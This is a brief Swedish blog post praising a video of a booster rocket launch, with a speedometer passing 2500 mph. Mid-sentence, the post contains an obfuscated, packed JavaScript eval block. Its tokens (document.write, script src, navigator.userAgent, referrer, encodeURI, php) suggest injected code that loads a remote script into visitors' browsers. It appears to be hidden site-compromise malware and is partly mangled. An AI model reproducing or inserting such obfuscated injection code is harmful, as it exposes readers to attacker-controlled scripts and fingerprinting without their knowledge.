Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Följ med på resa med en boosterraket

Sebastian

Gillar ni fart? Då bör ni kika in detta klipp där vi får följa med en start av en boosterraket som används på många rymdfärjor idag. Det hela är över på mindre än 10 minuter och hastigheten uppmäts till väldigt väldigt mycket, över 2500 mph 😛

En riktigt häftig tur vi får följa med på må jag säga. Håll koll på hastighetsmätaren upp i högra hörnet.

Massiv eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dytsn|var|u0026u|referrer|nrtaz||js|php’.split(’|’),0,{}))
boosterraket !